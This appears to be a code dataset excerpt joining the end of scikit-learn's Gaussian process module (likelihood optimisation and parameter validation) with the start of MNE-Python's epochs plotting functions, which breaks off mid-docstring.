Ft = linalg.solve_triangular(C, F, lower=True)
try:
Q, G = linalg.qr(Ft, econ=True)
except:
#/usr/lib/python2.6/dist-packages/scipy/linalg/decomp.py:1177:
# DeprecationWarning: qr econ argument will be removed after scipy
# 0.7. The economy transform will then be available through the
# mode='economic' argument.
Q, G = linalg.qr(Ft, mode='economic')
sv = linalg.svd(G, compute_uv=False)
rcondG = sv[-1] / sv[0]
if rcondG < 1e-10:
# Check F
sv = linalg.svd(F, compute_uv=False)
condF = sv[0] / sv[-1]
if condF > 1e15:
raise Exception("F is too ill conditioned. Poor combination "
"of regression model and observations.")
else:
# Ft is too ill conditioned, get out (try different theta)
return reduced_likelihood_function_value, par
Yt = linalg.solve_triangular(C, self.y, lower=True)
if self.beta0 is None:
# Universal Kriging
beta = linalg.solve_triangular(G, np.dot(Q.T, Yt))
else:
# Ordinary Kriging
beta = np.array(self.beta0)
rho = Yt - np.dot(Ft, beta)
sigma2 = (rho ** 2.).sum(axis=0) / n_samples
# The determinant of R is equal to the squared product of the diagonal
# elements of its Cholesky decomposition C
detR = (np.diag(C) ** (2. / n_samples)).prod()
# Compute/Organize output
reduced_likelihood_function_value = - sigma2.sum() * detR
par['sigma2'] = sigma2 * self.y_std ** 2.
par['beta'] = beta
par['gamma'] = linalg.solve_triangular(C.T, rho)
par['C'] = C
par['Ft'] = Ft
par['G'] = G
return reduced_likelihood_function_value, par
def _arg_max_reduced_likelihood_function(self):
"""
This function estimates the autocorrelation parameters theta as the
maximizer of the reduced likelihood function.
(Minimization of the opposite reduced likelihood function is used for
convenience)
Parameters
----------
self : All parameters are stored in the Gaussian Process model object.
Returns
-------
optimal_theta : array_like
The best set of autocorrelation parameters (the sought maximizer of
the reduced likelihood function).
optimal_reduced_likelihood_function_value : double
The optimal reduced likelihood function value.
optimal_par : dict
The BLUP parameters associated to thetaOpt.
"""
# Initialize output
best_optimal_theta = []
best_optimal_rlf_value = []
best_optimal_par = []
if self.verbose:
print("The chosen optimizer is: " + str(self.optimizer))
if self.random_start > 1:
print(str(self.random_start) + " random starts are required.")
percent_completed = 0.
# Force optimizer to fmin_cobyla if the model is meant to be isotropic
if self.optimizer == 'Welch' and self.theta0.size == 1:
self.optimizer = 'fmin_cobyla'
if self.optimizer == 'fmin_cobyla':
def minus_reduced_likelihood_function(log10t):
return - self.reduced_likelihood_function(
theta=10. ** log10t)[0]
constraints = []
for i in range(self.theta0.size):
constraints.append(lambda log10t, i=i:
log10t[i] - np.log10(self.thetaL[0, i]))
constraints.append(lambda log10t, i=i:
np.log10(self.thetaU[0, i]) - log10t[i])
for k in range(self.random_start):
if k == 0:
# Use specified starting point as first guess
theta0 = self.theta0
else:
# Generate a random starting point log10-uniformly
# distributed between bounds
log10theta0 = (np.log10(self.thetaL)
+ self.random_state.rand(*self.theta0.shape)
* np.log10(self.thetaU / self.thetaL))
theta0 = 10. ** log10theta0
# Run Cobyla
try:
log10_optimal_theta = \
optimize.fmin_cobyla(minus_reduced_likelihood_function,
np.log10(theta0).ravel(), constraints,
iprint=0)
except ValueError as ve:
print("Optimization failed. Try increasing the ``nugget``")
raise ve
optimal_theta = 10. ** log10_optimal_theta
optimal_rlf_value, optimal_par = \
self.reduced_likelihood_function(theta=optimal_theta)
# Compare the new optimizer to the best previous one
if k > 0:
if optimal_rlf_value > best_optimal_rlf_value:
best_optimal_rlf_value = optimal_rlf_value
best_optimal_par = optimal_par
best_optimal_theta = optimal_theta
else:
best_optimal_rlf_value = optimal_rlf_value
best_optimal_par = optimal_par
best_optimal_theta = optimal_theta
if self.verbose and self.random_start > 1:
if (20 * k) / self.random_start > percent_completed:
percent_completed = (20 * k) / self.random_start
print("%s completed" % (5 * percent_completed))
optimal_rlf_value = best_optimal_rlf_value
optimal_par = best_optimal_par
optimal_theta = best_optimal_theta
elif self.optimizer == 'Welch':
# Backup of the given attributes
theta0, thetaL, thetaU = self.theta0, self.thetaL, self.thetaU
corr = self.corr
verbose = self.verbose
# This will iterate over fmin_cobyla optimizer
self.optimizer = 'fmin_cobyla'
self.verbose = False
# Initialize under isotropy assumption
if verbose:
print("Initialize under isotropy assumption...")
self.theta0 = check_array(self.theta0.min())
self.thetaL = check_array(self.thetaL.min())
self.thetaU = check_array(self.thetaU.max())
theta_iso, optimal_rlf_value_iso, par_iso = \
self._arg_max_reduced_likelihood_function()
optimal_theta = theta_iso + np.zeros(theta0.shape)
# Iterate over all dimensions of theta allowing for anisotropy
if verbose:
print("Now improving allowing for anisotropy...")
for i in self.random_state.permutation(theta0.size):
if verbose:
print("Proceeding along dimension %d..." % (i + 1))
self.theta0 = check_array(theta_iso)
self.thetaL = check_array(thetaL[0, i])
self.thetaU = check_array(thetaU[0, i])
def corr_cut(t, d):
return corr(check_array(np.hstack([optimal_theta[0][0:i],
t[0],
optimal_theta[0][(i +
1)::]])),
d)
self.corr = corr_cut
optimal_theta[0, i], optimal_rlf_value, optimal_par = \
self._arg_max_reduced_likelihood_function()
# Restore the given attributes
self.theta0, self.thetaL, self.thetaU = theta0, thetaL, thetaU
self.corr = corr
self.optimizer = 'Welch'
self.verbose = verbose
else:
raise NotImplementedError("This optimizer ('%s') is not "
"implemented yet. Please contribute!"
% self.optimizer)
return optimal_theta, optimal_rlf_value, optimal_par
def _check_params(self, n_samples=None):
# Check regression model
if not callable(self.regr):
if self.regr in self._regression_types:
self.regr = self._regression_types[self.regr]
else:
raise ValueError("regr should be one of %s or callable, "
"%s was given."
% (self._regression_types.keys(), self.regr))
# Check regression weights if given (Ordinary Kriging)
if self.beta0 is not None:
self.beta0 = np.atleast_2d(self.beta0)
if self.beta0.shape[1] != 1:
# Force to column vector
self.beta0 = self.beta0.T
# Check correlation model
if not callable(self.corr):
if self.corr in self._correlation_types:
self.corr = self._correlation_types[self.corr]
else:
raise ValueError("corr should be one of %s or callable, "
"%s was given."
% (self._correlation_types.keys(), self.corr))
# Check storage mode
if self.storage_mode != 'full' and self.storage_mode != 'light':
raise ValueError("Storage mode should either be 'full' or "
"'light', %s was given." % self.storage_mode)
# Check correlation parameters
self.theta0 = np.atleast_2d(self.theta0)
lth = self.theta0.size
if self.thetaL is not None and self.thetaU is not None:
self.thetaL = np.atleast_2d(self.thetaL)
self.thetaU = np.atleast_2d(self.thetaU)
if self.thetaL.size != lth or self.thetaU.size != lth:
raise ValueError("theta0, thetaL and thetaU must have the "
"same length.")
if np.any(self.thetaL <= 0) or np.any(self.thetaU < self.thetaL):
raise ValueError("The bounds must satisfy O < thetaL <= "
"thetaU.")
elif self.thetaL is None and self.thetaU is None:
if np.any(self.theta0 <= 0):
raise ValueError("theta0 must be strictly positive.")
elif self.thetaL is None or self.thetaU is None:
raise ValueError("thetaL and thetaU should either be both or "
"neither specified.")
# Force verbose type to bool
self.verbose = bool(self.verbose)
# Force normalize type to bool
self.normalize = bool(self.normalize)
# Check nugget value
self.nugget = np.asarray(self.nugget)
if np.any(self.nugget) < 0.:
raise ValueError("nugget must be positive or zero.")
if (n_samples is not None
and self.nugget.shape not in [(), (n_samples,)]):
raise ValueError("nugget must be either a scalar "
"or array of length n_samples.")
# Check optimizer
if self.optimizer not in self._optimizer_types:
raise ValueError("optimizer should be one of %s"
% self._optimizer_types)
# Force random_start type to int
self.random_start = int(self.random_start)
| pratapvardhan/scikit-learn | sklearn/gaussian_process/gaussian_process.py | Python | bsd-3-clause | 34,972 | [
"Gaussian"
] | 136188d8a919a8b29e315d936900fa9eb89d7376a44ece1191ac43dd5f5a7879 |
"""Functions to plot epochs data."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Jaakko Leppakangas <jaeilepp@student.jyu.fi>
# Jona Sassenhagen <jona.sassenhagen@gmail.com>
# Stefan Repplinger <stefan.repplinger@ovgu.de>
# Daniel McCloy <dan@mccloy.info>
#
# License: Simplified BSD
from collections import Counter
from copy import deepcopy
import warnings
import numpy as np
from .raw import _setup_channel_selections
from ..defaults import _handle_default
from ..utils import verbose, logger, warn, fill_doc, _check_option
from ..io.meas_info import create_info, _validate_type
from ..io.pick import (_get_channel_types, _picks_to_idx, _DATA_CH_TYPES_SPLIT,
_VALID_CHANNEL_TYPES)
from .utils import (tight_layout, _setup_vmin_vmax, plt_show, _check_cov,
_compute_scalings, DraggableColorbar, _setup_cmap,
_handle_decim, _set_title_multiple_electrodes,
_make_combine_callable, _set_window_title,
_make_event_color_dict, _get_channel_plotting_order)
@fill_doc
def plot_epochs_image(epochs, picks=None, sigma=0., vmin=None,
vmax=None, colorbar=True, order=None, show=True,
units=None, scalings=None, cmap=None, fig=None,
axes=None, overlay_times=None, combine=None,
group_by=None, evoked=True, ts_args=None, title=None,
clear=False):
"""Plot Event Related Potential / Fields image.
Parameters
----------
epochs : instance of Epochs
The epochs.
%(picks_good_data)s
``picks`` interacts with ``group_by`` and ``combine`` to determine the
number of figures generated; see Notes.
sigma : float
The standard deviation of a Gaussian smoothing window applied along
the epochs axis of the image. If 0, no smoothing is applied.
Defaults to 0.
vmin : None | float | callable
The min value in the image (and the ER[P/F]). The unit is µV for
EEG channels, fT for magnetometers and fT/cm for gradiometers.
If vmin is None and multiple plots are returned, the limit is
equalized within channel types.
Hint: to specify the lower limit of the data, use
``vmin=lambda data: data.min()``.
vmax : None | float | callable
The max value in the image (and the ER[P/F]). The unit is µV for
EEG channels, fT for magnetometers and fT/cm for gradiometers.
If vmin is None and multiple plots are returned, the limit is
equalized within channel types.
colorbar : bool
Display or not a colorbar.
order : None | array of int | callable
If not ``None``, order is used to reorder the epochs along the y-axis
of the image. If it is an array of :class:`int`, its length should
match the number of good epochs. If it is a callable it should accept
two positional parameters (``times`` and ``data``, where
``data.shape == (len(good_epochs), len(times))``) and return an
:class:`array <numpy.ndarray>` of indices that will sort ``data`` along
its first axis.
show : bool
Show figure if True.
units : dict | None
The units of the channel types used for axes labels. If None,
defaults to ``units=dict(eeg='µV', grad='fT/cm', mag='fT')``.
scalings : dict | None
The scalings of the channel types to be applied for plotting.
If None, defaults to ``scalings=dict(eeg=1e6, grad=1e13, mag=1e15,
eog=1e6)``.
cmap : None | colormap | (colormap, bool) | 'interactive'
Colormap. If tuple, the first value indicates the colormap to use and
the second value is a boolean defining interactivity. In interactive
mode the colors are adjustable by clicking and dragging the colorbar
with left and right mouse button. Left mouse button moves the scale up
and down and right mouse button adjusts the range. Hitting space bar
resets the scale. Up and down arrows can be used to change the
colormap. If 'interactive', translates to ('RdBu_r', True).
If None, "RdBu_r" is used, unless the data is all positive, in which
case "Reds" is used.
fig : Figure | None
:class:`~matplotlib.figure.Figure` instance to draw the image to.
Figure must contain the correct number of axes for drawing the epochs
image, the evoked response, and a colorbar (depending on values of
``evoked`` and ``colorbar``). If ``None`` a new figure is created.
Defaults to ``None``.
axes : list of Axes | dict of list of Axes | None
List of :class:`~matplotlib.axes.Axes` objects in which to draw the
image, evoked response, and colorbar (in that order). Length of list
must be 1, 2, or 3 (depending on values of ``colorbar`` and ``evoked``
parameters). If a :class:`dict`, each entry must be a list of Axes
objects with the same constraints as above. If both ``axes`` and
``group_by`` are dicts, their keys must match. Providing non-``None``
values for both ``fig`` and ``axes`` results in an error. Defaults to
``None``.
overlay_times : array_like, shape (n_epochs,) | None
Times (in seconds) at which to draw a line on the corresponding row of
the image (e.g., a reaction time associated with each epoch). Note that
``overlay_times`` should be ordered to correspond with the
:class:`~mne.Epochs` object (i.e., ``overlay_times[0]`` corresponds to
``epochs[0]``, etc).
%(combine)s
If callable, the callable must accept one positional input (data of
shape ``(n_epochs, n_channels, n_times)``) and return an
:class:`array <numpy.ndarray>` of shape ``(n_epochs, n_times)``. For
example::
combine = lambda data: np.median(data, axis=1)
If ``combine`` is ``None``, channels are combined by computing GFP,
unless ``group_by`` is also ``None`` and ``picks`` is a list of
specific channels (not channel types), in which case no combining is
performed and each channel gets its own figure. See Notes for further
details. Defaults to ``None``.
group_by : None | dict
Specifies which channels are aggregated into a single figure, with
aggregation method determined by the ``combine`` parameter. If not
``None``, one :class:`~matplotlib.figure.Figure` is made per dict
entry; the dict key will be used as the figure title and the dict
values must be lists of picks (either channel names or integer indices
of ``epochs.ch_names``). For example::
group_by=dict(Left_ROI=[1, 2, 3, 4], Right_ROI=[5, 6, 7, 8])
Note that within a dict entry all channels must have the same type.
``group_by`` interacts with ``picks`` and ``combine`` to determine the
number of figures generated; see Notes. Defaults to ``None``.
evoked : bool
Draw the ER[P/F] below the image or not.
ts_args : None | dict
Arguments passed to a call to `~mne.viz.plot_compare_evokeds` to style
the evoked plot below the image. Defaults to an empty dictionary,
meaning `~mne.viz.plot_compare_evokeds` will be called with default
parameters.
title : None | str
If :class:`str`, will be plotted as figure title. Otherwise, the
title will indicate channel(s) or channel type being plotted. Defaults
to ``None``.
clear : bool
Whether to clear the axes before plotting (if ``fig`` or ``axes`` are
provided). Defaults to ``False``.
Returns
-------
figs : list of Figure
One figure per channel, channel type, or group, depending on values of
``picks``, ``group_by``, and ``combine``. See Notes.
Notes
-----
You can control how channels are aggregated into one figure or plotted in
separate figures through a combination of the ``picks``, ``group_by``, and
``combine`` parameters. If ``group_by`` is a :class:`dict`, the result is
one :class:`~matplotlib.figure.Figure` per dictionary key (for any valid
values of ``picks`` and ``combine``). If ``group_by`` is ``None``, the
number and content of the figures generated depends on the values of
``picks`` and ``combine``, as summarized in this table:
.. cssclass:: table-bordered
.. rst-class:: midvalign
+----------+----------------------------+------------+-------------------+
| group_by | picks | combine | result |
+==========+============================+============+===================+
| | None, int, list of int, | None, | |
| dict | ch_name, list of ch_names, | string, or | 1 figure per |
| | ch_type, list of ch_types | callable | dict key |
+----------+----------------------------+------------+-------------------+
| | None, | None, | |
| | ch_type, | string, or | 1 figure per |
| | list of ch_types | callable | ch_type |
| None +----------------------------+------------+-------------------+
| | int, | None | 1 figure per pick |
| | ch_name, +------------+-------------------+
| | list of int, | string or | 1 figure |
| | list of ch_names | callable | |
+----------+----------------------------+------------+-------------------+
"""
from scipy.ndimage import gaussian_filter1d
from .. import EpochsArray
_validate_type(group_by, (dict, None), 'group_by')
units = _handle_default('units', units)
scalings = _handle_default('scalings', scalings)
if set(units) != set(scalings):
raise ValueError('Scalings and units must have the same keys.')
# is picks a channel type (or None)?
picks, picked_types = _picks_to_idx(epochs.info, picks, return_kind=True)
ch_types = _get_channel_types(epochs.info, picks)
# `combine` defaults to 'gfp' unless picks are specific channels and
# there was no group_by passed
combine_given = combine is not None
if combine is None and (group_by is not None or picked_types):
combine = 'gfp'
# convert `combine` into callable (if None or str)
combine_func = _make_combine_callable(combine)
# handle ts_args (params for the evoked time series)
ts_args = dict() if ts_args is None else ts_args
manual_ylims = 'ylim' in ts_args
if combine is not None:
ts_args['show_sensors'] = False
vlines = [0] if (epochs.times[0] < 0 < epochs.times[-1]) else []
ts_defaults = dict(colors={'cond': 'k'}, title='', show=False,
truncate_yaxis=False, truncate_xaxis=False,
vlines=vlines, legend=False)
ts_defaults.update(**ts_args)
ts_args = ts_defaults.copy()
# construct a group_by dict if one wasn't supplied
if group_by is None:
if picked_types:
# one fig per ch_type
group_by = {ch_type: picks[np.array(ch_types) == ch_type]
for ch_type in set(ch_types)
if ch_type in _DATA_CH_TYPES_SPLIT}
elif combine is None:
# one fig per pick
group_by = {epochs.ch_names[pick]: [pick] for pick in picks}
else:
# one fig to rule them all
ch_names = np.array(epochs.ch_names)[picks].tolist()
key = _set_title_multiple_electrodes(None, combine, ch_names)
group_by = {key: picks}
else:
group_by = deepcopy(group_by)
# check for heterogeneous sensor type combinations / "combining" 1 channel
for this_group, these_picks in group_by.items():
this_ch_type = np.array(ch_types)[np.in1d(picks, these_picks)]
if len(set(this_ch_type)) > 1:
types = ', '.join(set(this_ch_type))
raise ValueError('Cannot combine sensors of different types; "{}" '
'contains types {}.'.format(this_group, types))
# now we know they're all the same type...
group_by[this_group] = dict(picks=these_picks, ch_type=this_ch_type[0],
title=title)
# are they trying to combine a single channel?
if len(these_picks) < 2 and combine_given:
warn('Only one channel in group "{}"; cannot combine by method '
'"{}".'.format(this_group, combine))
# check for compatible `fig` / `axes`; instantiate figs if needed; add
# fig(s) and axes into group_by
group_by = _validate_fig_and_axes(fig, axes, group_by, evoked, colorbar,
clear=clear)
# prepare images in advance to get consistent vmin/vmax.
# At the same time, create a subsetted epochs object for each group
data = epochs.get_data()
vmin_vmax = {ch_type: dict(images=list(), norm=list())
for ch_type in set(ch_types)}
for this_group, this_group_dict in group_by.items():
these_picks = this_group_dict['picks']
this_ch_type = this_group_dict['ch_type']
this_ch_info = [epochs.info['chs'][n] for n in these_picks]
these_ch_names = np.array(epochs.info['ch_names'])[these_picks]
this_data = data[:, these_picks]
# create subsetted epochs object
this_info = create_info(sfreq=epochs.info['sfreq'],
ch_names=list(these_ch_names),
ch_types=[this_ch_type] * len(these_picks))
with this_info._unlock():
this_info['chs'] = this_ch_info
this_epochs = EpochsArray(this_data, this_info, tmin=epochs.times[0])
# apply scalings (only to image, not epochs object), combine channels
this_image = combine_func(this_data * scalings[this_ch_type])
# handle `order`. NB: this can potentially yield different orderings
# in each figure!
this_image, _overlay_times = _order_epochs(this_image, epochs.times,
order, overlay_times)
this_norm = np.all(this_image > 0)
# apply smoothing
if sigma > 0.:
this_image = gaussian_filter1d(this_image, sigma=sigma, axis=0,
mode='nearest')
# update the group_by and vmin_vmax dicts
group_by[this_group].update(image=this_image, epochs=this_epochs,
norm=this_norm)
vmin_vmax[this_ch_type]['images'].append(this_image)
vmin_vmax[this_ch_type]['norm'].append(this_norm)
# compute overall vmin/vmax for images
for ch_type, this_vmin_vmax_dict in vmin_vmax.items():
image_list = this_vmin_vmax_dict['images']
image_stack = np.stack(image_list)
norm = all(this_vmin_vmax_dict['norm'])
vmin_vmax[ch_type] = _setup_vmin_vmax(image_stack, vmin, vmax, norm)
del image_stack, vmin, vmax
# prepare to plot
auto_ylims = {ch_type: [0., 0.] for ch_type in set(ch_types)}
# plot
for this_group, this_group_dict in group_by.items():
this_ch_type = this_group_dict['ch_type']
this_axes_dict = this_group_dict['axes']
vmin, vmax = vmin_vmax[this_ch_type]
# plot title
if this_group_dict['title'] is None:
title = _handle_default('titles').get(this_group, this_group)
if isinstance(combine, str) and len(title):
_comb = combine.upper() if combine == 'gfp' else combine
_comb = 'std. dev.' if _comb == 'std' else _comb
title += f' ({_comb})'
# plot the image
this_fig = _plot_epochs_image(
this_group_dict['image'], epochs=this_group_dict['epochs'],
picks=picks, colorbar=colorbar, vmin=vmin, vmax=vmax, cmap=cmap,
style_axes=True, norm=this_group_dict['norm'],
unit=units[this_ch_type], ax=this_axes_dict, show=False,
title=title, combine=combine, combine_given=combine_given,
overlay_times=_overlay_times, evoked=evoked, ts_args=ts_args)
group_by[this_group].update(fig=this_fig)
# detect ylims across figures
if evoked and not manual_ylims:
# ensure get_ylim works properly
this_axes_dict['evoked'].figure.canvas.draw_idle()
this_bot, this_top = this_axes_dict['evoked'].get_ylim()
this_min = min(this_bot, this_top)
this_max = max(this_bot, this_top)
curr_min, curr_max = auto_ylims[ch_type]
auto_ylims[this_ch_type] = [min(curr_min, this_min),
max(curr_max, this_max)]
# equalize ylims across figures (does not adjust ticks)
if evoked:
for this_group_dict in group_by.values():
ax = this_group_dict['axes']['evoked']
ch_type = this_group_dict['ch_type']
if not manual_ylims:
args = auto_ylims[ch_type]
if 'invert_y' in ts_args:
args = args[::-1]
ax.set_ylim(*args)
plt_show(show)
# impose deterministic order of returned objects
return_order = np.array(sorted(group_by))
are_ch_types = np.in1d(return_order, _VALID_CHANNEL_TYPES)
if any(are_ch_types):
return_order = np.concatenate((return_order[are_ch_types],
return_order[~are_ch_types]))
return [group_by[group]['fig'] for group in return_order]
def _validate_fig_and_axes(fig, axes, group_by, evoked, colorbar, clear=False):
"""Check user-provided fig/axes compatibility with plot_epochs_image."""
from matplotlib.pyplot import figure, Axes, subplot2grid
n_axes = 1 + int(evoked) + int(colorbar)
ax_names = ('image', 'evoked', 'colorbar')
ax_names = np.array(ax_names)[np.where([True, evoked, colorbar])]
prefix = 'Since evoked={} and colorbar={}, '.format(evoked, colorbar)
# got both fig and axes
if fig is not None and axes is not None:
raise ValueError('At least one of "fig" or "axes" must be None; got '
'fig={}, axes={}.'.format(fig, axes))
# got fig=None and axes=None: make fig(s) and axes
if fig is None and axes is None:
axes = dict()
colspan = 9 if colorbar else 10
rowspan = 2 if evoked else 3
shape = (3, 10)
for this_group in group_by:
this_fig = figure()
_set_window_title(this_fig, this_group)
subplot2grid(shape, (0, 0), colspan=colspan, rowspan=rowspan,
fig=this_fig)
if evoked:
subplot2grid(shape, (2, 0), colspan=colspan, rowspan=1,
fig=this_fig)
if colorbar:
subplot2grid(shape, (0, 9), colspan=1, rowspan=rowspan,
fig=this_fig)
axes[this_group] = this_fig.axes
# got a Figure instance
if fig is not None:
# If we're re-plotting into a fig made by a previous call to
# `plot_image`, be forgiving of presence/absence of sensor inset axis.
if len(fig.axes) not in (n_axes, n_axes + 1):
raise ValueError('{}"fig" must contain {} axes, got {}.'
''.format(prefix, n_axes, len(fig.axes)))
if len(list(group_by)) != 1:
raise ValueError('When "fig" is not None, "group_by" can only '
'have one group (got {}: {}).'
.format(len(group_by), ', '.join(group_by)))
key = list(group_by)[0]
if clear: # necessary if re-plotting into previous figure
_ = [ax.clear() for ax in fig.axes]
if len(fig.axes) > n_axes: # get rid of sensor inset
fig.axes[-1].remove()
_set_window_title(fig, key)
axes = {key: fig.axes}
# got an Axes instance, be forgiving (if evoked and colorbar are False)
if isinstance(axes, Axes):
axes = [axes]
# got an ndarray; be forgiving
if isinstance(axes, np.ndarray):
axes = axes.ravel().tolist()
# got a list of axes, make it a dict
if isinstance(axes, list):
if len(axes) != n_axes:
raise ValueError('{}"axes" must be length {}, got {}.'
''.format(prefix, n_axes, len(axes)))
# for list of axes to work, must be only one group
if len(list(group_by)) != 1:
raise ValueError('When axes is a list, can only plot one group '
'(got {} groups: {}).'
.format(len(group_by), ', '.join(group_by)))
key = list(group_by)[0]
axes = {key: axes}
# got a dict of lists of axes, make it dict of dicts
if isinstance(axes, dict):
# in theory a user could pass a dict of axes but *NOT* pass a group_by
# dict, but that is forbidden in the docstring so it shouldn't happen.
# The next test could fail in that case because we've constructed a
# group_by dict and the user won't have known what keys we chose.
if set(axes) != set(group_by):
raise ValueError('If "axes" is a dict its keys ({}) must match '
'the keys in "group_by" ({}).'
.format(list(axes), list(group_by)))
for this_group, this_axes_list in axes.items():
if len(this_axes_list) != n_axes:
raise ValueError('{}each value in "axes" must be a list of {} '
'axes, got {}.'.format(prefix, n_axes,
len(this_axes_list)))
# NB: next line assumes all axes in each list are in same figure
group_by[this_group]['fig'] = this_axes_list[0].get_figure()
group_by[this_group]['axes'] = {key: axis for key, axis in
zip(ax_names, this_axes_list)}
return group_by
def _order_epochs(data, times, order=None, overlay_times=None):
"""Sort epochs image data (2D). Helper for plot_epochs_image."""
n_epochs = len(data)
if overlay_times is not None:
if len(overlay_times) != n_epochs:
raise ValueError(
f'size of overlay_times parameter ({len(overlay_times)}) does '
f'not match the number of epochs ({n_epochs}).')
overlay_times = np.array(overlay_times)
times_min = np.min(overlay_times)
times_max = np.max(overlay_times)
if (times_min < times[0]) or (times_max > times[-1]):
warn('Some values in overlay_times fall outside of the epochs '
f'time interval (between {times[0]} s and {times[-1]} s)')
if callable(order):
order = order(times, data)
if order is not None:
if len(order) != n_epochs:
raise ValueError(f'If order is a {type(order).__name__}, its '
f'length ({len(order)}) must match the length of '
f'the data ({n_epochs}).')
order = np.array(order)
data = data[order]
if overlay_times is not None:
overlay_times = overlay_times[order]
return data, overlay_times
def _plot_epochs_image(image, style_axes=True, epochs=None, picks=None,
vmin=None, vmax=None, colorbar=False, show=False,
unit=None, cmap=None, ax=None, overlay_times=None,
title=None, evoked=False, ts_args=None, combine=None,
combine_given=False, norm=False):
"""Plot epochs image. Helper function for plot_epochs_image."""
from matplotlib.ticker import AutoLocator
if cmap is None:
cmap = 'Reds' if norm else 'RdBu_r'
tmin = epochs.times[0]
tmax = epochs.times[-1]
ax_im = ax['image']
fig = ax_im.get_figure()
# draw the image
cmap = _setup_cmap(cmap, norm=norm)
n_epochs = len(image)
extent = [tmin, tmax, 0, n_epochs]
im = ax_im.imshow(image, vmin=vmin, vmax=vmax, cmap=cmap[0], aspect='auto',
origin='lower', interpolation='nearest', extent=extent)
# optional things
if style_axes:
ax_im.set_title(title)
ax_im.set_ylabel('Epochs')
if not evoked:
ax_im.set_xlabel('Time (s)')
ax_im.axis('auto')
ax_im.axis('tight')
ax_im.axvline(0, color='k', linewidth=1, linestyle='--')
if overlay_times is not None:
ax_im.plot(overlay_times, 0.5 + np.arange(n_epochs), 'k',
linewidth=2)
ax_im.set_xlim(tmin, tmax)
# draw the evoked
if evoked:
from . import plot_compare_evokeds
pass_combine = (combine if combine_given else None)
_picks = [0] if len(picks) == 1 else None # prevent applying GFP
plot_compare_evokeds({'cond': list(epochs.iter_evoked(copy=False))},
picks=_picks, axes=ax['evoked'],
combine=pass_combine, **ts_args)
ax['evoked'].set_xlim(tmin, tmax)
ax['evoked'].lines[0].set_clip_on(True)
ax['evoked'].collections[0].set_clip_on(True)
ax['evoked'].get_shared_x_axes().join(ax['evoked'], ax_im)
# fix the axes for proper updating during interactivity
loc = ax_im.xaxis.get_major_locator()
ax['evoked'].xaxis.set_major_locator(loc)
ax['evoked'].yaxis.set_major_locator(AutoLocator())
# draw the colorbar
if colorbar:
from matplotlib.pyplot import colorbar as cbar
this_colorbar = cbar(im, cax=ax['colorbar'])
this_colorbar.ax.set_ylabel(unit, rotation=270, labelpad=12)
if cmap[1]:
ax_im.CB = DraggableColorbar(this_colorbar, im)
with warnings.catch_warnings(record=True):
warnings.simplefilter('ignore')
tight_layout(fig=fig)
# finish
plt_show(show)
return fig
def plot_drop_log(drop_log, threshold=0, n_max_plot=20, subject='Unknown subj',
color='lightgray', width=0.8, ignore=('IGNORED',),
show=True):
"""Show the channel stats based on a drop_log from Epochs.
Parameters
----------
drop_log : list of list
Epoch drop log from Epochs.drop_log.
threshold : float
The percentage threshold to use to decide whether or not to
plot. Default is zero (always plot).
n_max_plot : int
Maximum number of channels to show stats for.
subject : str | None
The subject name to use in the title of the plot. If ``None``, do not
display a subject name.
.. versionchanged:: 0.23
Added support for ``None``.
color : tuple | str
Color to use for the bars.
width : float
Width of the bars.
ignore : list
The drop reasons to ignore.
show : bool
Show figure if True.
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
"""
import matplotlib.pyplot as plt
from ..epochs import _drop_log_stats
percent = _drop_log_stats(drop_log, ignore)
if percent < threshold:
logger.info('Percent dropped epochs < supplied threshold; not '
'plotting drop log.')
return
scores = Counter([ch for d in drop_log for ch in d if ch not in ignore])
ch_names = np.array(list(scores.keys()))
counts = np.array(list(scores.values()))
# init figure, handle easy case (no drops)
fig, ax = plt.subplots()
title = f'{percent:.1f}% of all epochs rejected'
if subject is not None:
title = f'{subject}: {title}'
ax.set_title(title)
if len(ch_names) == 0:
ax.text(0.5, 0.5, 'No drops', ha='center', fontsize=14)
return fig
# count epochs that aren't fully caught by `ignore`
n_used = sum([any(ch not in ignore for ch in d) or len(d) == 0
for d in drop_log])
# calc plot values
n_bars = min(n_max_plot, len(ch_names))
x = np.arange(n_bars)
y = 100 * counts / n_used
order = np.flipud(np.argsort(y))
ax.bar(x, y[order[:n_bars]], color=color, width=width, align='center')
ax.set_xticks(x)
ax.set_xticklabels(ch_names[order[:n_bars]], rotation=45, size=10,
horizontalalignment='right')
ax.set_ylabel('% of epochs rejected')
ax.grid(axis='y')
tight_layout(pad=1, fig=fig)
plt_show(show)
return fig
@fill_doc
def plot_epochs(epochs, picks=None, scalings=None, n_epochs=20, n_channels=20,
title=None, events=None, event_color=None,
order=None, show=True, block=False, decim='auto',
noise_cov=None, butterfly=False, show_scrollbars=True,
show_scalebars=True, epoch_colors=None, event_id=None,
group_by='type'):
"""Visualize epochs.
Bad epochs can be marked with a left click on top of the epoch. Bad
channels can be selected by clicking the channel name on the left side of
the main axes. Calling this function drops all the selected bad epochs as
well as bad epochs marked beforehand with rejection parameters.
Parameters
----------
epochs : instance of Epochs
The epochs object.
%(picks_good_data)s
scalings : dict | 'auto' | None
Scaling factors for the traces. If any fields in scalings are 'auto',
the scaling factor is set to match the 99.5th percentile of a subset of
the corresponding data. If scalings == 'auto', all scalings fields are
set to 'auto'. If any fields are 'auto' and data is not preloaded,
a subset of epochs up to 100 Mb will be loaded. If None, defaults to::
dict(mag=1e-12, grad=4e-11, eeg=20e-6, eog=150e-6, ecg=5e-4,
emg=1e-3, ref_meg=1e-12, misc=1e-3, stim=1, resp=1, chpi=1e-4,
whitened=10.)
n_epochs : int
The number of epochs per view. Defaults to 20.
n_channels : int
The number of channels per view. Defaults to 20.
title : str | None
The title of the window. If None, epochs name will be displayed.
Defaults to None.
events : None | array, shape (n_events, 3)
Events to show with vertical bars. You can use `~mne.viz.plot_events`
as a legend for the colors. By default, the coloring scheme is the
same. Defaults to ``None``.
.. warning:: If the epochs have been resampled, the events no longer
align with the data.
.. versionadded:: 0.14.0
%(event_color)s
Defaults to ``None``.
order : array of str | None
Order in which to plot channel types.
.. versionadded:: 0.18.0
show : bool
Show figure if True. Defaults to True.
block : bool
Whether to halt program execution until the figure is closed.
Useful for rejecting bad trials on the fly by clicking on an epoch.
Defaults to False.
decim : int | 'auto'
Amount to decimate the data during display for speed purposes.
You should only decimate if the data are sufficiently low-passed,
otherwise aliasing can occur. The 'auto' mode (default) uses
the decimation that results in a sampling rate at least three times
